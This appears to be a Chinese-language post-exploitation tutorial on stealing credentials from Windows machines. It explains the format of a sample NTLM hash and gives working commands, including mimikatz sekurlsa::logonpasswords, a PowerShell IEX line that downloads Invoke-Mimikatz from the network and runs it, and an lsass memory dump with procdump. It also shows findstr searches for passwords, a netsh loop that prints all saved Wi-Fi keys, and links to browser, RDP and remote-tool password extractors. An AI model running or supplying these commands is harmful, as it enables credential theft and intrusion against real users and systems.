Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值。

Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040

用户名称为:Administrator

RID为:500

LM-HASH值为:AF01DF70036EBACFAAD3B435B51404EE

NT-HASH值为:44F077E27F6FEF69E7BD834C7242B040

破解方式一:hash在线破解网站:

https://www.objectif-securite.ch/ophcrack

http://cmd5.com

 破解方式二:mimikatzGithub地址:https://github.com/gentilkiwi/mimikatz

mimikatz使用起来也非常简单,提取Windows系统的明文密码只需两行命令:.

privilege::debug

sekurlsa::logonpasswords

 破解方式三:wce

wce的常用参数使用说明如下:

参数解释:

-l 列出登录的会话和NTLM凭据(默认值)

-s 修改当前登录会话的NTLM凭据 参数:<用户名>:<域名>::

-w 通过摘要式认证缓存一个明文的密码

破解方式四:Powershell+mimikatz直接利用poweshell来调用mimikatz抓取系统内的明文密码。

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

 破解方式五:prodump+mimikatzprocdump是微软官方提供的一个小工具微软官方下载地址:https://technet.microsoft.com/en-us/sysinternals/dd996900

# 将工具拷贝到目标机器上执行如下命令(需要管理员权限,我选择的版本是64位)

procdump.exe -accepteula -ma lsass.exe lsass.dmp

# 将生成的内存dump文件拷贝到mimikatz同目录下,双击打开mimikatz执行情况如图:

mimikatz # sekurlsa::minidump lsass.dmp

# Switch to MINIDUMP

mimikatz # sekurlsa::logonPasswords full

 2、抓取浏览器密码很多浏览器都提供了记住密码的功能,用户在登录一些网站的时候会选择记住密码。LaZagne:提取浏览器所保存的密码github项目地址:https://github.com/AlessandroZ/LaZagne3、服务端明文密码在一些配置文件或日志里,明文记录着敏感的密码信息,如web.config、config.ini等文件,可通过手动翻查敏感目录,也可以通过findstr命令来查找敏感文件和内容。

findstr /i /s "password" *.config

findstr /i /s "password" *.ini

findstr /i /s "password" *.xml

 4、第三方运维工具托管密码常见的有Linux运维工具,如Putty、xshell、winscp等,RDP管理工具,Remote Desktop Organizer,远控软件:Teamviewer、向日葵、VNC等。xshell 密码解密工具:https://github.com/dzxs/Xdecrypt提取WinSCP,PuTTY等保存的会话信息:https://github.com/Arvanaghi/SessionGopher从内存中提权TeamViewer密码的工具:https://github.com/attackercan/teamviewer-dumper星号查看器—-一键破解星号密码

5、查看电脑wifi密码

# 查看电脑连接过的所有wifi

netsh wlan show profiles

# 查看wifi信号为Aaron的密码

netsh wlan show profiles name="Aaron" key=clear

# CMD一键获取 所有连接过的WIFI密码

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

 6、Windows密码提取工具合集各种Windows程序的免费密码恢复工具,包括各种浏览器、邮箱、Windows网络密码、无线网络密钥。IE浏览器提取密码工具:https://www.nirsoft.net/toolsdownload/iepv.zipFirefox 浏览器密码提取工具:https://www.nirsoft.net/toolsdownload/passwordfox-x64.zipChrome 浏览器密码提取工具:https://www.nirsoft.net/toolsdownload/chromepass.zipSVN密码解密器:http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip邮箱密码提取工具:https://www.nirsoft.net/toolsdownload/mailpv.zip提取.rdp文件中存储的密码:https://www.nirsoft.net/toolsdownload/rdpv.zipMSSQL凭据密码获取工具:http://www.zcgonvh.com/post/mssql_credential_pwddump.html

 

查看原文